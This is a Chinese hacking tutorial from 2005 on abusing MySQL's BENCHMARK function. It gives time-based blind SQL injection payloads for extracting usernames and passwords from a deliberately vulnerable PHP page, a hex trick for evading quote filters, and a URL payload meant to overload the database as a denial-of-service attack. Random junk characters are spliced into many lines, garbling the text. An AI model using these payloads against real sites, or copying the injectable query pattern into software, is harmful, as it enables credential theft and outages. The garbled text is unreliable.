MYSQL中BENCHMARK函数的利用

admin

MYSQL中BENCHMARK函数的利用
/ Y. W  }6 I3 `$ b, r本文作者：SuperHei
文章性质：原创
$ F- g  C+ p' F' A3 O% Z1 y发布日期：2005-01-02
完成日期：2004-07-09
第一部

- ]6 m) T! p2 w( m$ W利用时间推延进行注射---BENCHMARK函数在注射中的利用

一.前言/思路

　　如果你看了angel的《SQL Injection with MySQL》一文，你有会发现一般的mysql+php的注射都是通过返回错误信息，和union联合查询替换原来查询语句中的字段而直接输出敏感信息，但是有的时候，主机设置为不显示错误信息：display_errors = Off 而且有的代码中sql查询后只是简单的对查询结果进行判断，而不要求输出查询结果，我们用上面的办法注射将一无所获。我们可以采用时间推延来进行判断注射了。

　　本技术的主要思路：通过在构造的语句用加入执行时间推延的函数，如果我们提交的判断是正确的，那么mysql查询时间就出现推延，如果提交的判断是正确，将不会执行时间推延的函数，查询语句将不会出现推延。这样我们就可以进行判断注射。
' z( t- |. [5 X7 p# g
二.关于BENCHMARK函数

* o  L! |" S1 [# I　　在MySQL参考手册里可以看到如下描叙：
& P* W  K3 V0 F7 @7 v
/ L; L/ ?* q0 ]" N
--------------------------------------------------------------------------------
, ]( F/ d& W, k
BENCHMARK(count,expr)
BENCHMARK()函数重复countTimes次执行表达式expr，它可以用于计时MySQL处理表达式有多快。结果值总是0。意欲用于mysql客户，它报告查询的执行时间。
mysql> select BENCHMARK(1000000,encode("hello","goodbye"));
4 `/ @! s- l: [+----------------------------------------------+
3 j( w8 @' z6 Z/ ^| BENCHMARK(1000000,encode("hello","goodbye")) |
+----------------------------------------------+
| 0 |
+----------------------------------------------+
- }  P' h/ E, k! `" _1 row in set (4.74 sec)

3 e" g0 E( E0 K3 x% O9 n) j; O) A报告的时间是客户端的经过时间，不是在服务器端的CPU时间。执行BENCHMARK()若干次可能是明智的，并且注意服务器机器的负载有多重来解释结果。


--------------------------------------------------------------------------------
* H$ w9 w% W+ N9 _& W' ?8 M
5 V0 T2 X) }- T; P1 T6 d" [　　只要我们把参数count 设置大点，那么那执行的时间就会变长。下面我们看看在mysql里执行的效果：

mysql> select md5( 'test' );
+----------------------------------+
| md5( 'test' ) |
" K+ d. b. B2 ^; @0 l  i+----------------------------------+
| 098f6bcd4621d373cade4e832627b4f6 |
3 E. v( h9 D7 S: A9 T+----------------------------------+
! [1 |0 Q' ~) d# ~$ s* x% Y2 [1 row in set (0.00 sec) 〈-----------执行时间为0.00 sec

mysql> select benchmark( 500000, md5( 'test' ) );
+------------------------------------+
| benchmark( 500000, md5( 'test' ) ) |
* g# ]6 Q- @+ L0 Y& Q1 k. S8 t+------------------------------------+
| 0 |
+------------------------------------+
( O1 C7 R( g/ S: Q' w1 row in set (6.55 sec) 〈------------执行时间为6.55 sec
7 M6 G4 Z( m- D! S' K: M

" }3 C0 b( w5 o& }* W# m- e; G$ ~　　由此可以看出使用benchmark执行500000次的时间明显比正常执行时间延长了。

/ {& q4 H9 ~2 B三.具体例子

　　首先我们看个简单的php代码：
/ a9 w$ e0 I! g7 ~; B! K9 R/ ]3 M
< ?php
9 u# N! s5 |# @' G& U$servername = "localhost";
& y- g, S2 I2 P6 H9 [$dbusername = "root";
$dbpassword = "";
$dbname = "injection";

9 Q9 @# Z$ c& D0 _mysql_connect($servername,$dbusername,$dbpassword) or die ("数据库连接失败");

$sql = "SELECT * FROM article WHERE articleid=$id";
# p# z# C" m' X4 l! t' V$result = mysql_db_query($dbname,$sql);
9 D+ X) }: l9 \' \2 O9 d$row = mysql_fetch_array($result);

if (!$row)
% \, @7 {1 h9 K5 f{
exit;
}
5 D, c, |# J- S+ |( Q?>
  \' L% e) `+ C, Z! `. t
- r8 i! u& Q7 Z% z' o
　　数据库injection结构和内容如下：
% J# m) C+ y0 R. r
# 数据库 : `injection`
#
, t2 b' X' W2 L# T# s3 ~# ?/ O- h" `
# --------------------------------------------------------

#
$ {. I/ ?+ r7 |6 N# 表的结构 `article`
! y* A' h7 A. P, a' f. q#

! b$ G3 Q3 d3 T- z3 z+ ?0 WCREATE TABLE `article` (
`articleid` int(11) NOT NULL auto_increment,
`title` varchar(100) NOT NULL default '',
`content` text NOT NULL,
% c, @1 X  M0 d, N% ^8 r# n7 o' y/ I* qPRIMARY KEY (`articleid`)
) TYPE=MyISAM AUTO_INCREMENT=3 ;

$ B% p/ U8 X+ W#
# 导出表中的数据 `article`
. h: w# r- T6 ~) ^. Q* f) j#
5 J, Z# c8 c3 d( N9 r3 c& W
INSERT INTO `article` VALUES (1, '我是一个不爱读书的孩子', '中国的教育制度真是他妈的落后！如果我当教育部长。我要把所有老师都解雇！操～');
INSERT INTO `article` VALUES (2, '我恨死你', '我恨死你了，你是什么东西啊');
/ I/ }2 ^# `; k8 i6 h
# --------------------------------------------------------
! ?0 o4 V. O' ]% e0 l
* B* E: b% N2 c% @3 b0 q#
9 u- h4 x+ Z. S# 表的结构 `user`
#
4 \# C# c9 Q+ X" D9 D* x4 J
CREATE TABLE `user` (
`userid` int(11) NOT NULL auto_increment,
; e% L- c6 Z. ?6 {9 b) v`username` varchar(20) NOT NULL default '',
`password` varchar(20) NOT NULL default '',
, E# x7 p" a2 I# w$ w% x. f# vPRIMARY KEY (`userid`)
! z; o  [" b3 P% S) TYPE=MyISAM AUTO_INCREMENT=3 ;

#
# 导出表中的数据 `user`
#
2 q) P% y( \0 F" n6 d
INSERT INTO `user` VALUES (1, 'angel', 'mypass');
INSERT INTO `user` VALUES (2, '4ngel', 'mypass2');
* d& a( Q2 e9 V. D9 O
! g' ?' S3 U6 ?( e6 X
7 g0 |6 f8 o( X) K* }9 U/ @! w　　代码只是对查询结果进行简单的判断是否存在，假设我们已经设置display_errors=Off。我们这里就没办法利用union select的替换直接输出敏感信息(ps:这里不是说我们不利用union，因为在mysql中不支持子查询)或通过错误消息返回不同来判断注射了。我们利用union联合查询插入BENCHMARK函数语句来进行判断注射：
) ^$ Z9 P+ D5 p6 X( O! x
id=1 union select 1,benchmark(500000,md5('test')),1 from user where userid=1 and ord(substring(username,1,1))=97 /*
: ]$ B1 U3 d/ |0 j% R, ?2 K
0 a2 p* W  G; _: |6 F" N
& a. j! g- f& g  _( w" l6 m　　上面语句可以猜userid为1的用户名的第一位字母的ascii码值是是否为97，如果是97，上面的查询将由于benchmark作用而延时。如果不为97，将不回出现延时，这样我们最终可以猜出管理员的用户名和密码了。 大家注意，这里有一个小技巧：在benchmark(500000,md5('test'))中我们使用了'号， 这样是很危险的，因为管理员随便设置下 就可以过滤使注射失败，我们这里test可以是用其他进制表示，如16进制。最终构造如下：
* F& |) _8 m# T) {* T: Y9 u+ z
# m8 m% y/ D" h9 {/ {http://127.0.0.1/test/test/show.php?id=1%20union%20select%201,benchmark(500000,md5(0x41)),1%20from%20user%20where%20userid=1%20and%20ord(substring(username,1,1))=97%20/*


$ l( G9 G8 c/ F" \, Z3 w$ d　　执行速度很慢，得到userid为1的用户名的第一位字母的ascii码值是是为97。
" E" ~4 N" `: v# j/ ]
% T' }; l% Y  B1 c  K: T9 U　　注意：我们在使用union select事必须知道原来语句查询表里的字段数，以往我们是根据错误消息来判断，我们在union select 1,1,1我们不停的增加1 如果字段数正确将正常返回不会出现错误，而现在不可以使用这个方法了，那我们可以利用benchmark(),我们这样构造 union select benchmark(500000,md5(0x41)) 1,1 我们在增加1的，当字段数正确时就回执行benchmark()出现延时，这样我们就可以判断字段数了。

第二部
/ v4 }" z; I# q' A* ], s
利用BENCHMARK函数进行ddos攻击

! b# T, s% v5 B# q' [2 y) E　　其实思路很简单：在BENCHMARK(count,expr) 中 我们只要设置count 就是执行次数足够大的话，就可以造成dos攻击了，如果我们用代理或其他同时提交，就是ddos攻击，估计数据库很快就会挂了。不过前提还是要求可以注射。语句：

. l* k3 K2 l# i$ r5 W' g% ]http://127.0.0.1/test/test/show.php?id=1%20union%20select%201,1,benchmark(99999999,md5(0x41))

) E* b) ~2 _) A( ?
. y- d5 q$ I0 e4 c# }小结

　　本文主要思路来自http://www.ngssoftware.com/papers/HackproofingMySQL.pdf，其实关于利用时间差进行注射在mssql注射里早有应用，只是所利用的函数不同而已（见http://www.ngssoftware.com/papers/more_advanced_sql_injection.pdf）。关于mysql+php一般注射的可以参考angel的文章《SQL Injection with MySQL》。
" V) U: [! _# A
& x' M" }2 A2 M1 ]1 ]/ q4 Q6 f